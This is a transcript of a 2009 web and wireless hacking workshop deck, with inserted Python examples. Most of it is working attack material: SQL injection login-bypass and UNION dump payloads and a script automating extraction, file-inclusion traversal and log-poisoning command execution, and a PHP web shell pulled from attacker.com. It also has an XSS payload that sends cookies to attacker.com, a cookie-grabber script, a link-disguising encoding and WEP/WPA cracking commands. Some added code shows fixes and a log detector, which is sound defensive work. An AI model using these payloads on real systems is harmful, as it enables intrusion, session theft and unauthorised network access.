Web & Wireless Hacking

Complete Guide on Web & Wireless Hacking
Presentation Transcript

IPSECS
WEB & WIRELESS HACKING
Don "df0x" Anto
Makasar, June 2009
www.ipsecs.com

Content
• Introduction
• Web Exploitation
  – SQL Injection
  – File Inclusion
  – XSS
• Breaking Wireless Infrastructure
  – War Driving
  – Exploiting Wireless Network

Introduction
• Don "df0x" Anto
• IT security researcher
• Hacker?? No, IT security researcher
• Contact – we@ipsecs.com
• URL – http://ipsecs.com – http://kandangjamur.net
• Bachelor's degree in Electrical Engineering
• Add me on Facebook: dj.antoxz@gmail.com

1st Day, WEB HACKING

Web Exploitation
• Exploiting programming flaws in web applications.
• Programming mistakes always happen.
• Targets clients or servers.
• Possible outcomes: stealing databases and other sensitive information, stealing cookies or sessions, executing arbitrary commands, or fully compromising the system.
• It is easy to do. Google helps you :).

Common Web Exploitation
• SQL Injection: an attack targeting sensitive information in the database server. Can lead to system compromise.
• File Inclusion: an attack usually used to gain shell access on the remote target.
  – Local file inclusion
  – Remote file inclusion
• Cross Site Scripting (XSS): an attack targeting the users (clients) of the vulnerable website.
  – DOM-based
  – Persistent
  – Non-persistent
SQL INJECTION

SQL Injection
• Injecting malicious SQL into the application's query to gain something from it.
• Usually used to bypass a login or steal sensitive information from the database. Further attacks can lead to full system compromise.
• Root cause: user input is not validated or sanitised before it is used in the query.
• All examples and demos below are in PHP/MySQL.

SQL Injection in login form
• User input from the login form is not validated before being executed by the database.
• An attacker can send arbitrary SQL through the login form and bypass the login process.
• The attacker can also execute other SQL queries.

Vulnerable Code
• Example vulnerable code in a login process:
    $pass = md5($_POST['password']);
    $query = "SELECT * FROM tblUser WHERE username = '" . $_POST['username'] . "' AND password = '" . $pass . "'";
    $q = mysql_query($query);
• The username sent from the login form is not validated, so a quote inside it ends the string literal and everything after it is parsed as SQL.

Exploit Login
• Exploit input:
    username = admin' OR 'a'='a
    password = terserah    (any value; Indonesian for "whatever")
• SQL query executed by the database server:
    SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'

(screenshot) SQL Injection in login form

SQL Logic
• AND binds tighter than OR, so the WHERE clause is evaluated as:
    username = 'admin' OR ('a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47')
• The parenthesised part is FALSE (the hash does not match), which leaves:
    username = 'admin' OR FALSE
• That is TRUE for the admin row, so the query returns admin's record.
• The attacker has bypassed the login form.
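The login bypass above, worked through in runnable Python as an added example that is not part of the original slides. SQLite stands in for MySQL so it runs offline; tblUser, the md5 password storage and the admin' OR 'a'='a input follow the deck, while the sample rows, the admin password and the parameterised fix are assumptions made here.

```python
"""Login-bypass SQL injection from the slides, reproduced against SQLite.
Added example; not code from the original presentation."""
import hashlib
import sqlite3

# Constructed sample rows standing in for the slides' tblUser table.
_ROWS = [("admin", hashlib.md5(b"s3cret-admin-pw").hexdigest()),   # assumed admin password
         ("bob", hashlib.md5(b"bobpass").hexdigest())]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL database used in the deck."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUser (username TEXT, password TEXT)")
    db.executemany("INSERT INTO tblUser VALUES (?, ?)", _ROWS)
    return db


def build_vulnerable_query(username: str, password: str) -> str:
    """Same string concatenation as the slides' PHP: user input lands inside the SQL text."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return ("SELECT username FROM tblUser WHERE username = '" + username
            + "' AND password = '" + pw_hash + "'")


def vulnerable_login(db, username: str, password: str):
    """Returns the username the database matched, or None. Mirrors mysql_query($query)."""
    row = db.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(db, username: str, password: str):
    """Fix: a parameterised query binds the input as data, so it is never parsed as SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute("SELECT username FROM tblUser WHERE username = ? AND password = ?",
                     (username, pw_hash)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR 'a'='a"
    print(build_vulnerable_query(payload, "terserah"))
    print("vulnerable:", vulnerable_login(db, payload, "terserah"))   # admin
    print("parameterised:", safe_login(db, payload, "terserah"))     # None
```

The payload leaves the trailing quote open so the application's own closing quote completes 'a'='a'; AND/OR precedence then does the rest exactly as the SQL Logic slide describes. With the bound parameters the whole string is compared against the username column and no row matches.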
SQL Injection in URI parameter
• A parameter from the URI is not validated before being used in the query.
• An attacker can send arbitrary SQL by modifying the parameter.

Vulnerable Code
• Example vulnerable code reading a URI parameter:
    $query = "SELECT * FROM news WHERE id=" . $_GET['aid'];
    $q = mysql_query($query);
• Parameter aid, taken from the URI, is not validated. The id is numeric, so the query has no quotes around it and the payload needs none either.

Exploiting SQL Injection
• Checking for the vulnerability with AND logic (the two responses should differ):
    http://example.com/news.php?aid=1 AND 1=1--
    http://example.com/news.php?aid=1 AND 1=0--
• Finding the number of columns with UNION SELECT (add a column until the database stops complaining about a column-count mismatch):
    http://example.com/news.php?aid=1 UNION SELECT 1--
    http://example.com/news.php?aid=1 UNION SELECT 1,2--
    http://example.com/news.php?aid=1 UNION SELECT 1,2,3,...,n--
• Note: MySQL only treats -- as a comment when a space follows it, so in a URL write --+ or --%20.

(screenshot) Finding the number of columns

SQL Injection in URI parameter
• In this case the query behind "news" returns 3 columns.

Exploiting SQL Injection
• Listing the tables in the current database (aid=-1 makes the original SELECT return no row, so the page renders the UNION row; the third column is the one the page displays):
    http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--
• Listing the columns of table tblUser:
    http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'--
  or with the string as a hex literal, which needs no quotes (useful when quotes are escaped or filtered; 0x74626c55736572 is "tblUser"):
    http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572--

(screenshot) Tables in the database

Exploiting SQL Injection
• Viewing records in a table (0x2c is the comma used as separator):
    http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser--
• Viewing arbitrary files (only if the database user holds the FILE privilege and the file is readable by the MySQL server process):
    http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
  or as a hex literal (0x2f6574632f706173737764 is "/etc/passwd"):
    http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)--

(screenshot) Viewing table records
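The UNION extraction described above, scripted in Python as an added example that is not part of the original slides. An in-memory SQLite database stands in for MySQL: SQLite has no information_schema, so sqlite_master replaces information_schema.tables and || replaces CONCAT_WS. The vulnerable news.php query, the aid=-1 UNION SELECT payload shape, and the tblUser column names follow the deck; the sample rows and the hardened endpoint are constructed here.

```python
"""UNION-based column counting and data extraction against the slides' news.php query.
Added example; not code from the original presentation. SQLite stands in for MySQL."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: the news table behind news.php plus the tblUser target."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'Hello', 'first post')")
    db.execute("CREATE TABLE tblUser (username TEXT, password TEXT, namaLengkap TEXT)")
    db.execute("INSERT INTO tblUser VALUES ('admin', 'e00b29d5b34c3f78df09d45921c9ec47', 'Administrator')")
    return db


def news_page(db, aid: str):
    """The vulnerable endpoint: $query = "SELECT * FROM news WHERE id=" . $_GET['aid'];
    Returns the rows the page would render, or raises the database error."""
    return db.execute("SELECT * FROM news WHERE id=" + aid).fetchall()


def find_column_count(db, max_cols: int = 16):
    """Grow `1 UNION SELECT 1,2,...,n` until the column-count mismatch error disappears."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            news_page(db, f"1 UNION SELECT {cols}")
            return n
        except sqlite3.OperationalError:   # "SELECTs ... do not have the same number of result columns"
            continue
    return None


def extract(db, expr: str, source: str):
    """Put `expr` into the last column (the one the page displays) of a UNION row.
    aid=-1 makes the original SELECT return nothing, so only the injected row comes back."""
    ncols = find_column_count(db)
    filler = ",".join(str(i) for i in range(1, ncols))
    rows = news_page(db, f"-1 UNION SELECT {filler},{expr} {source}")
    return [row[-1] for row in rows]


def list_tables(db):
    # Deck: GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()
    return extract(db, "group_concat(name)", "FROM sqlite_master WHERE type='table'")[0].split(",")


def dump_users(db):
    # Deck: CONCAT_WS(0x2c, username, password, namaLengkap) FROM tblUser
    return extract(db, "username || ',' || password || ',' || namaLengkap", "FROM tblUser")


def news_page_safe(db, aid: str):
    """Fix: reject anything that is not a plain integer, then bind it as a parameter."""
    if not aid.isdigit():
        raise ValueError("aid must be a positive integer")
    return db.execute("SELECT * FROM news WHERE id=?", (int(aid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("columns:", find_column_count(db))   # 3
    print("tables:", list_tables(db))
    print("users:", dump_users(db))
```

The column-count loop is the automated form of the 1 / 1,2 / 1,2,3 probing on the slide; everything after it reuses one filler string and only swaps the expression and the FROM clause, which is exactly how the deck's later payloads differ from each other.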
FILE INCLUSION

File Inclusion
• Making the server include a malicious or sensitive file, so that it is executed or displayed.
• Usually used to steal sensitive information, execute arbitrary commands, or compromise the system.
• Root cause: user input is not validated or sanitised before it reaches include().
• All examples and demos below are in PHP.

Local File Inclusion
• Including a file that already exists on the vulnerable server.
• Usually used to read sensitive files or execute arbitrary commands. Further attacks can lead to full system compromise.
• Root cause: user input is not validated or sanitised.

Vulnerable Code
• Example vulnerable code:
    define('DOCROOT', '/var/www/html/modules');
    $filename = DOCROOT . "/" . $_GET['module'] . ".php";
    include($filename);
• Parameter module, taken from the URI, is not validated: ../ sequences walk out of DOCROOT.

Viewing Sensitive Files
• Requests that read sensitive files on the vulnerable system:
    http://example.com/index.php?module=../../../../../../../etc/passwd%00
    http://example.com/index.php?module=../../../../../../../etc/group%00
• The %00 (NUL byte) cuts the path off before the appended ".php". This works in PHP versions before 5.3.4; later versions reject paths that contain a NUL byte.

(screenshot) File /etc/passwd
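The traversal above, plus the check that stops it, as an added Python example that is not part of the original slides. It rebuilds the DOCROOT . "/" . $_GET['module'] . ".php" pattern, emulates the pre-5.3.4 NUL truncation (PHP handed the path to a C string function, so everything after the first NUL byte was dropped), and contrasts it with a resolver that canonicalises the path and refuses anything outside DOCROOT. The temporary directory layout and the fake /etc/passwd line are constructed here.

```python
"""Local file inclusion path handling: the vulnerable concatenation from the slides
versus a hardened resolver. Added example; not code from the original presentation."""
import os
import shutil
import tempfile
from urllib.parse import unquote


def vulnerable_path(docroot: str, module: str) -> str:
    """What include() actually opened: the URL-decoded parameter glued into the path,
    then truncated at the first NUL like a C string (PHP before 5.3.4)."""
    raw = docroot + "/" + unquote(module) + ".php"
    return raw.split("\0", 1)[0]


def safe_path(docroot: str, module: str) -> str:
    """Hardened version: decode, refuse NUL bytes, resolve '..' and symlinks, and require
    the canonical result to stay under DOCROOT. Raises ValueError on traversal."""
    name = unquote(module)
    if "\0" in name:
        raise ValueError("NUL byte in module name")
    base = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(base, name + ".php"))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes DOCROOT: " + target)
    return target


def demo() -> dict:
    """Build a throwaway tree: <root>/var/www/html/modules/news.php and <root>/etc/passwd,
    then run the slides' module=../../../../etc/passwd%00 against both resolvers."""
    root = tempfile.mkdtemp()
    try:
        docroot = os.path.join(root, "var", "www", "html", "modules")
        os.makedirs(docroot)
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(docroot, "news.php"), "w") as f:
            f.write("<?php echo 'news'; ?>")
        with open(os.path.join(root, "etc", "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed sample line
        traversal = "../../../../etc/passwd%00"            # four levels up from modules/
        results = {
            "legit": vulnerable_path(docroot, "news"),
            "traversal": vulnerable_path(docroot, traversal),
        }
        with open(results["traversal"]) as f:              # the file really is served
            results["leaked"] = f.read()
        try:
            safe_path(docroot, traversal)
            results["blocked"] = False
        except ValueError:
            results["blocked"] = True
        results["safe_legit"] = safe_path(docroot, "news")
        return results
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=", repr(v))
```

The realpath-then-commonpath check is what makes the fix hold even when the attacker avoids literal "../" (symlinks, encoded separators): the decision is taken on the canonical path the kernel would open, not on the string the user sent. An allowlist of module names is simpler still when the set of modules is fixed.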
Placing a Malicious Log Entry
• Write PHP code into the Apache access log by sending a raw request with telnet (a browser would URL-encode the tag; Apache logs the request line exactly as received, whatever status it answers with):
    $ telnet example.com 80
    Trying example.com...
    Connected to example.com.
    Escape character is '^]'.
    GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1
    Host: example.com

(screenshot) Malicious log entry

Executing Commands
• Include the Apache access_log through the LFI and the PHP written into it runs. This only works if the web server user can read the log; the path varies by distribution (e.g. /var/log/apache2/access.log on Debian/Ubuntu):
    http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=uname -a
    http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=id

(screenshot) Command "id"
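From the defender's side, both halves of the log-poisoning attack above are visible in the same access log, so the check a practitioner wants is a detector run over it. The following is an added Python example, not part of the original slides: it parses constructed Apache combined-format lines (the first two mirror the deck's telnet request and LFI URL), flags request lines carrying a PHP tag, and flags module= values that traverse with ../ or a NUL byte. The log format and finding names are assumptions.

```python
"""Detect log poisoning and LFI attempts in Apache access_log lines.
Added example; not code from the original presentation."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines. Line 1 is what the deck's telnet request leaves behind
# (Apache answers 400 but still records the whole request line); line 2 is the LFI trigger.
SAMPLE_LOG = r'''
10.0.0.5 - - [12/Jun/2009:10:01:02 +0700] "GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1" 400 226 "-" "-"
10.0.0.5 - - [12/Jun/2009:10:01:30 +0700] "GET /index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=id HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jun/2009:10:02:00 +0700] "GET /index.php?module=news HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''.strip().splitlines()

# Non-greedy URI match: a poisoned request line contains spaces inside the "URI".
_REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>.*?) HTTP/[\d.]+"')
_PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def classify(line: str) -> list:
    """Return the finding names for one log line (empty when nothing is suspicious)."""
    m = _REQ.search(line)
    if not m:
        return []
    uri = m.group("uri")
    findings = []
    if _PHP_TAG.search(unquote(uri)):
        findings.append("php-tag-in-request")        # poisoned entry
    params = parse_qs(urlsplit(uri).query)            # parse_qs already percent-decodes
    for value in params.get("module", []):
        if "\0" in value or "../" in value:
            findings.append("lfi-traversal")
            if "cmd" in params:
                findings.append("lfi-with-cmd")        # traversal plus a command parameter
    return findings


def scan(lines) -> dict:
    """Map line index -> findings for every line that produced at least one finding."""
    return {i: f for i, f in ((i, classify(l)) for i, l in enumerate(lines)) if f}


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG).items():
        print(idx, findings)
```

Matching on the decoded URI matters for both rules: the NUL arrives as %00 and the tag can be sent encoded, and the vulnerable application sees the decoded form either way.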
Remote File Inclusion
• Including a file from a remote server (the attacker's) so that the vulnerable server executes it.
• Usually used to run arbitrary commands through a web shell. Further attacks can lead to full system compromise.
• Root cause: user input is not validated or sanitised, and allow_url_include is enabled (PHP 5.2 and later ship with it off, which is why RFI is rarer than LFI on newer installs).

Vulnerable Code
• Example vulnerable code:
    $filename = $_GET['page'] . ".php";
    include($filename);
• Parameter page, taken from the URI, is not validated.

PHP Shell
• A simple web shell (injek.txt, served as plain text from the attacker's host so that it is not executed there):
    <?php
    /* Basic PHP web shell injek.txt */
    if (isset($_GET['exec']) && !empty($_GET['exec'])) {
        $cmd = $_GET['exec'];
        if (function_exists('passthru')) {
            passthru($cmd);
        }
    }
    ?>

Public PHP Shells
• Widely known web shells: r57, c99.
• Commonly used when exploiting remote file inclusion.

(screenshot) r57

Executing Commands
• Injecting commands (the ".php" the code appends lands in the remote URL; ending the page value with ? turns it into a harmless query string):
    http://example.com/view.php?page=http://attacker.com/injek.txt&exec=id
    http://example.com/view.php?page=http://attacker.com/injek.txt&exec=ls -al

(screenshot) Command ls -al
CROSS SITE SCRIPTING

Cross Site Scripting
• Inserting HTML/JavaScript that is executed by the browser of a client who views the vulnerable website.
• Usually used to steal the client's cookies, for phishing, or to trick the user into downloading an arbitrary file.
• Root cause: user input is not validated or encoded before it is echoed into the page.
• All examples and demos below are in PHP/MySQL.

Cross Site Scripting
• DOM-based XSS: the vulnerable code is client-side JavaScript that writes attacker-controlled data (e.g. from the URL fragment) into the page; the payload does not have to reach the server at all.
• Non-persistent (reflected) XSS: a vulnerable page echoes part of the request; exploited by tricking the user into clicking a malicious URI. Characteristic: temporary.
• Persistent (stored) XSS: a vulnerable page stores the malicious code (e.g. in the database) and serves it to every visitor. Characteristic: permanent.

Vulnerable Code
• Example vulnerable code:
    echo "<pre> Searching for " . $_GET['key'] . "...</pre><br/>\n";
• Parameter key, sent from the search form, is not validated or encoded.

Cross Site Scripting
• Checking whether the page is vulnerable:
    http://example.com/search.php?key=<script>alert('XSS found dude!')</script>

(screenshot) Cross Site Scripting

Cookie Stealing
• Stealing the cookie:
    http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script>
• Content of payload.js:
    document.location="http://attacker.com/cookie-save.php?c="+document.cookie

Cookie Grabber
• Content of cookie-save.php:
    <?php
    /* Cookie stealer */
    $f = fopen('/tmp/cookie.txt', 'a');
    $date = date("j F, Y, g:i a");
    fwrite($f, "IP Address : " . $_SERVER['REMOTE_ADDR'] . "\n" .
               "Cookie : " . $_GET['c'] . "\n" .
               "Date and Time : " . $date . "\n" . "\n\n");
    fclose($f);
    ?>

Hex (URL) Encoding
• Disguising the malicious URI by percent-encoding every byte of the payload. The server decodes it before the vulnerable echo, so the script still runs; the encoding only hides the script tag from a person reading the link:
    http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script>
  becomes
    http://example.com/search.php?key=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e
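The reflected XSS in search.php, the output-encoding fix, and the percent-encoding trick above, as an added Python example that is not part of the original slides. It models the vulnerable echo and its htmlspecialchars()-style counterpart as two functions over the same decoded input, regenerates the deck's encoded URI from the plain payload, and shows that both forms render identically. The payload and the hex string are the ones on the slides; the Python functions are stand-ins for the PHP and are assumptions made here.

```python
"""Reflected XSS: vulnerable echo, escaped echo, and percent-encoded payloads.
Added example; not code from the original presentation."""
import html
from urllib.parse import unquote

PAYLOAD = '<script src="http://attacker.com/payload.js"></script>'

# The percent-encoded form from the slides, joined back into one string.
HEX_ENCODED = ("%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b"
               "%65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e")


def vulnerable_search(key: str) -> str:
    # echo "<pre> Searching for " . $_GET['key'] . "...</pre><br/>\n";  (PHP decodes $_GET first)
    return "<pre> Searching for " + unquote(key) + "...</pre><br/>\n"


def safe_search(key: str) -> str:
    # Same page with htmlspecialchars($_GET['key'], ENT_QUOTES) on output: < > & " ' become entities.
    return "<pre> Searching for " + html.escape(unquote(key), quote=True) + "...</pre><br/>\n"


def encode_every_byte(s: str) -> str:
    """Reproduce the deck's "hexal encoding": percent-encode every byte, lowercase hex."""
    return "".join("%%%02x" % b for b in s.encode())


def contains_script(rendered: str) -> bool:
    """Crude check used here only to compare the two renderings."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(encode_every_byte(PAYLOAD) == HEX_ENCODED)              # True
    print(vulnerable_search(HEX_ENCODED) == vulnerable_search(PAYLOAD))  # True: same HTML reaches the browser
    print(safe_search(PAYLOAD))                                   # entities, no executable tag
```

Because the decoding happens before the echo, any filter that looks at the raw query string for "<script" is bypassed by the encoded link, while output encoding on the decoded value defeats both. The cookie-grabber payload still fails against cookies flagged HttpOnly, which document.cookie cannot read.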
DEMO - Q&A WEB HACKING

THANK YOU!

2nd Day, WIRELESS HACKING
Wireless Network
• Now widely used on campuses, in government, in companies, and in many public places.
• Provides network access for mobile devices.
• More flexible than a wired network.
• Less secure than a wired network, so here we go!

War Driving
• Searching for Wi-Fi wireless networks.
• Public tools for war driving:
  – Windows: NetStumbler, Wireshark
  – Linux: Kismet, aircrack-ng, AirSnort, Wireshark
  – OS X: KisMAC
• I'm using Ubuntu Linux 8.10.

Kismet
• Console-based 802.11 wireless network detector and sniffer.
• It identifies wireless networks by passively sniffing: it transmits nothing, and it also finds networks that hide their SSID from beacons.
• It is in the Ubuntu repository, or download it from www.kismetwireless.net.
• Use apt-get install kismet on Ubuntu; read the README if you want to install from source.

(screenshot) Kismet

AirSnort
• GUI-based 802.11 wireless network detector.
• Designed as a WEP cracker.
• It is not in the Ubuntu repository; download it from www.sourceforge.net.
• Read the README to install.

aircrack-ng (formerly: aircrack)
• Console-based 802.11 suite: airodump-ng captures, aireplay-ng injects, aircrack-ng cracks.
• Designed as a WEP and WPA-PSK cracker.
• It is in the Ubuntu repository, or download it from www.aircrack-ng.org.
• Use apt-get install aircrack-ng on Ubuntu; read the README if you want to install from source.

(screenshot) aircrack-ng (formerly: aircrack)
    airodump wlan0

Wireshark
• GUI-based network protocol analyzer for UNIX and Windows.
• The most complete protocol analyzer, with dissectors for a very large number of protocols.
• It is in the Ubuntu repository, or download it from www.wireshark.org.
• Use apt-get install wireshark on Ubuntu; read the README if you want to install from source.

(screenshot) Wireshark

NetStumbler
• Best-known Windows tool for finding wireless networks.
• It works like Kismet on Linux or KisMAC on OS X, except that it probes actively instead of sniffing passively, so it is itself visible to anyone listening.
• Download NetStumbler from www.netstumbler.com.
• Since I use Ubuntu, there's no demo for this tool.

(screenshot) NetStumbler
Wireless Network Protection
• MAC filtering
• WEP (Wired Equivalent Privacy)
• WPA (Wi-Fi Protected Access)
• WPA2 (Wi-Fi Protected Access 2)
• Captive portal

Exploiting Wireless Networks
• Misconfiguration (human error)
• Spoofing
• Cracking the protection
• Denial of service

Misconfiguration
• Default configuration on the device (access point)
• Default username and password
• Default IP address range
• SNMP "public" and "private" communities
• No encryption enabled

Spoofing & Rogue AP
• Spoofing the MAC address to bypass MAC filtering: sniff the address of a client that is already allowed, then clone it. MAC addresses are sent in the clear in every frame, so the filter stops nobody who is listening.
• Tools
  – Linux: ifconfig
  – Windows: smac, regedit
• Creating a rogue AP to trick wireless users, then doing man-in-the-middle and sniffing.
• Tools
  – airsnarf http://airsnarf.shmoo.com

(screenshot) MAC Spoofing
WEP Cracking
• WEP is based on the RC4 stream cipher and a CRC32 integrity check (ICV).
• Collect as many weak IVs (Initialization Vectors) as possible for the FMS attack. The newer PTW attack (aircrack-ng -z) needs far fewer captured IVs.
• Speed up IV collection with traffic injection (e.g. ARP request replay with aireplay-ng).
• Tools: aircrack-ng, AirSnort

WEP Cracking
• Put the interface into monitor mode.
• Run Kismet to find the target AP.
• Find an AP with connected clients. If no client is connected, do a fake authentication to associate with the AP.
• Inject packets using aireplay-ng.
• Dump packets using airodump-ng.
• Crack the dump file using aircrack-ng.

Dumping Packets
    airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0

Cracking the Key
    aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap
    Key is "abcdef1234"
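What "WEP is based on RC4 and CRC32" means at frame level, as an added Python example that is not part of the original slides. It implements RC4, builds a WEP frame as IV || key-id || RC4(IV || key) XOR (payload || CRC32(payload)), verifies the ICV on decryption, and then shows why the 24-bit IV is the weak point: two frames under the same IV leak the XOR of their plaintexts with no key involved. The key is the "abcdef1234" string from the deck's demo interpreted as 40-bit hex; IVs and payloads are constructed. The FMS/PTW key recovery the slides refer to is a further statistical step not implemented here.

```python
"""WEP frame construction with RC4 + CRC32, and the IV-reuse keystream leak.
Added example; not code from the original presentation."""
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes: key-scheduling (KSA) then generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Return IV || key-id byte || ciphertext. The ICV is CRC32 of the payload (little-endian),
    appended before encryption; the RC4 seed is the 3-byte IV followed by the 40/104-bit key."""
    assert len(iv) == 3 and len(key) in (5, 13)
    icv = zlib.crc32(payload).to_bytes(4, "little")
    body = payload + icv
    return iv + b"\x00" + _xor(rc4(iv + key, len(body)), body)


def wep_decrypt(key: bytes, frame: bytes):
    """Return (payload, icv_ok). The IV is read from the frame, which is why it is public."""
    iv, body = frame[:3], frame[4:]
    plain = _xor(rc4(iv + key, len(body)), body)
    payload, icv = plain[:-4], plain[-4:]
    return payload, zlib.crc32(payload).to_bytes(4, "little") == icv


def iv_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames with the same IV (and key) share a keystream, so XORing the ciphertexts
    yields plaintext_a XOR plaintext_b: knowing one plaintext reveals the other."""
    assert frame_a[:3] == frame_b[:3], "needs the same IV"
    n = min(len(frame_a), len(frame_b)) - 4
    return _xor(frame_a[4:4 + n], frame_b[4:4 + n])


KEY = bytes.fromhex("abcdef1234")   # the key from the deck's demo, read as 40-bit hex (assumption)

if __name__ == "__main__":
    f = wep_encrypt(KEY, b"\x01\x02\x03", b"hello wireless")
    print(f.hex())
    print(wep_decrypt(KEY, f))
```

With only 2^24 IVs and busy networks cycling through them in hours, IV reuse is guaranteed; the FMS and PTW attacks go further and recover the key itself from the relationship between the public IV, the first keystream bytes and the secret key bytes that the RC4 KSA exposes.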
WPA Cracking
• WPA uses TKIP (still RC4-based); WPA2 uses CCMP (AES). In Personal (PSK) mode both derive the pairwise master key from the passphrase and the SSID, so the passphrase is the weak point.
• WPA-PSK can be attacked with a dictionary attack once a 4-way handshake has been captured.
• Of course, it needs a dictionary.
• Cracking is done offline, against the captured handshake.
• Tools: aircrack-ng

WPA Cracking
• Put the interface into monitor mode.
• Run Kismet to find the target AP.
• Find an AP protected by WPA-PSK.
• Dump packets using airodump-ng.
• Wait for a client to authenticate to the AP, or deauthenticate a connected client (aireplay-ng) so that it reconnects and you capture the handshake.
• Crack the dump file using aircrack-ng.

WPA Cracking
    airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0

WPA Cracking
    aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap
    Key is "miko2009"
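The offline step that makes the dictionary attack above possible, as an added Python example that is not part of the original slides. In WPA/WPA2-Personal the pairwise master key is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); aircrack-ng computes this for every wordlist entry and checks the result against the MIC in the captured 4-way handshake. The SSID and wordlist are constructed, and a precomputed "target PMK" stands in for the handshake check, which needs real capture data (nonces, MAC addresses and the MIC). The passphrase miko2009 is the one from the deck's demo.

```python
"""WPA-PSK passphrase-to-PMK derivation and an offline dictionary attack against it.
Added example; not code from the original presentation."""
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i passphrase-to-PSK mapping: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def dictionary_attack(target_pmk: bytes, ssid: str, wordlist):
    """Return the passphrase whose PMK matches, or None. One PBKDF2 run per candidate
    (4096 HMAC-SHA1 iterations) is the whole cost; because the SSID is the salt the work
    must be redone per network, which is why rainbow tables only help for common SSIDs."""
    for word in wordlist:
        word = word.strip()
        if not 8 <= len(word) <= 63:          # WPA passphrases are 8..63 ASCII characters
            continue
        if hmac.compare_digest(wpa_pmk(word, ssid), target_pmk):
            return word
    return None


# Constructed scenario modelled on the deck's demo network; "miko2009" is the key it recovered.
SSID = "ipsecs-lab"                           # assumed SSID
TARGET_PMK = wpa_pmk("miko2009", SSID)        # stands in for the handshake-derived check
WORDLIST = ["password", "letmein", "miko", "miko2008", "miko2009", "miko2010"]

if __name__ == "__main__":
    print(dictionary_attack(TARGET_PMK, SSID, WORDLIST))   # miko2009
```

The derivation is deliberately slow, but a short dictionary word like the one recovered on the slide falls in seconds; the defence is a long random passphrase (or WPA-Enterprise), not a stronger cipher suite, since TKIP and CCMP share this same PMK step.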
Denial of Service
• Making the wireless network unavailable, e.g. by flooding deauthentication frames, which 802.11 clients accept without any authentication.
• Tools: airjack, void11, aircrack-ng

